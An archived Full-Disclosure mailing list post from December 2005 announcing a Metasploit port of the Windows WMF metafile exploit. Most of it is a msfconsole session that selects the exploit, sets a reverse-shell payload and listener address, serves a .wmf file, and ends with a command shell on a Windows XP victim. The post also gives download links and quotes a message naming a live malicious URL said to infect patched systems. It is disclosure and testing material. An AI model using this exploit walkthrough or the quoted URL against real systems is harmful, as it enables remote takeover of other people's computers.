SECURITYVULNS:DOC:10827
Dec 28, 2005 - 12:00 a.m.

[Full-disclosure] Someone wasted a nice bug on spyware...


In reference to:
http://www.securityfocus.com/archive/1/420288/30/0/threaded

I ported the exploit to the Metasploit Framework in case anyone wants to
test it without installing a thousand spyware apps…

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.

-HD

+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>

On Tuesday 27 December 2005 14:20, [email protected] wrote:
> Warning the following URL successfully exploited a fully patched
> windows xp system with a freshly updated norton anti virus.
>
> unionseek.com/d/t1/wmf_exp.htm
>
> The url runs a .wmf and executes the virus, f-secure will pick up the
> virus norton will not.


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/